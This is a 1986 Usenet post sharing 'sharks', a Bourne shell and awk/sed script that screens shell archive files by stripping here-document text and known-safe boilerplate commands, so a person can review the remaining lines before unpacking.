rdm@hoptoad.uucp (Rich Morin) (09/30/86)
:
# sharks - SHell ARchive checK Script (N.B., Bourne shell)
#
# The "shar" utility is really a neat hack, but it scares me silly
# from a security perspective. I DON'T LIKE giving my session over
# to someone else's script, despite the fact that I can take a few
# precautions. Scanning a shar file for gotchas is impractical,
# since it takes too much time, and one can still miss things.
# Besides, there is even a nifty gotcha I saw that causes vi to
# perform commands while reading in a file(!)
#
# So, I wrote this piece of paranoid code to help me scan shar files
# in a reasonably efficient manner. It throws away all the here
# document text (using a somewhat naive algorithm), then throws away
# command lines it (quite conservatively) thinks are safe. The rest
# of the text goes to standard output, for storage and/or perusal.
#
# I'm sure it isn't foolproof. (It doesn't even TRY to look at the
# code that is being unpacked...) Still, the resulting output is
# short and sweet, and it tells me everything I want to know before
# submitting my session to the file...
#
# Usage: sharks foo bar ...
#
# Copyright (C) 1986, Richard Morin. All Rights Reserved.
#
# Use it (at your own risk, of course), but don't sell it. Also,
# please let me know about any problems and/or improvements you find.
#
# Richard Morin, proprietor {hoptoad,leadsv,lll-lcc}!cfcl!rdm
# Canta Forda Computer Lab. +1 415 994 6860
# Post Office Box 1488 Full spectrum consulting services
# Pacifica, CA 94044 USA for science and engineering.
#
# P.S. Long live awk, sed, and sh ! ! !
P='[0-9A-Za-z_-][0-9A-Za-z_-]*' # pattern for sed script
sed 's/ / /' $* | # kill off tabs
awk ' # kill off here document text
{
if (hd == 1) { # here document text
ss2 = $0 # get test string
while (substr(ss2,1,1) == " ")
ss2 = substr(ss2,2)
if (index(ss2,ss) == 1) { # end of here text
hd = 0
next
}
}
else # not here document text
print $0
}
/<</ { # start of here document?
if (hd == 1) # no, already in one
next
hd = 1 # yes, set up flags
ss = $0
ss = substr(ss,index(ss,"<<")+2)
while (substr(ss,1,1) == " ")
ss = substr(ss,2)
fc = substr(ss,1,1)
if (fc == "'\''") { # single quotes used
ss = substr(ss,2)
ssq = index(ss,"'\''")
ss = substr(ss,1,ssq-1)
}
else if (fc == "\"") { # double quotes used
ss = substr(ss,2)
ssq = index(ss,"\"")
ss = substr(ss,1,ssq-1)
}
else { # no quotes used
if (fc == "\\")
ss = substr(ss,2)
if ((sse = index(ss," ")) > 1)
ss = substr(ss,1,sse-1)
}
}
' |
#
# Note that this code is more than a little bit paranoid. Keep it
# that way... The code is also rather sprawling, since there seem
# to be about twenty gazillion different versions of shar floating
# about. Last, if you don't know what it is, don't play with it!!
#
sed ' # kill off shar noise
/^ *\/bin\/echo [^`;|(>]*$/d
/^ *\/bin\/echo [^`;|(>]*; \/bin\/ls [^`;|(>]*$/d
/^ *\/bin\/ls [^`;|(>]*$/d
/^ *echo [^`;|(>]*$/d
/^ *echo [^`;|(>]*([^`;|(>]*)'\'' *$/d
/^ *echo [^`;|(>]*; ls [^`;|(>]*$/d
/^ *echo [^`;|(>]*`wc [^`;|(>]*` *$/d
/^ *else *$/d
/^ *exit *[0-9]* *$/d
/^ *fi *$/d
/^ *fi #[^`;|(>]*$/d
/^ *if \[ [0-9A-Za-z]*\$'$P' = '$P' ]; then *$/d
/^ *if \[ `wc -c < [^`;|(>]*` != '$P' ]; then *$/d
/^ *if test -f '\''[^`;|(>]*'\'' *$/d
/^ *if test '$P' != \$1 *$/d
/^ *if test '$P' -ne "`wc -c [^`;|(>]*`" *$/d
/^ *if test '$P' -ne "`wc -c '\''[^`;|(>]*'\''`" *$/d
/^ *if test '$P' -ne "`wc -c < '\''[^`;|(>]*'\''`" *$/d
/^ *ls [^`;|(>]*$/d
/^ *set `sum [^`;|(>]*` *$/d
/^ *then *$/d
/^ *wc [^`;|(>]* | sed [^`;|(>]* | diff -b \$'$P' - *$/d
/^ *'$P'='$P' *$/d
'
exit 0 # sh doesn't like signature text...
--
Richard Morin, proprietor {hoptoad,leadsv,lll-lcc}!cfcl!rdm
Canta Forda Computer Lab. +1 415 994 6860
Post Office Box 1488 Full spectrum consulting services
Pacifica, CA 94044 USA for science and engineering.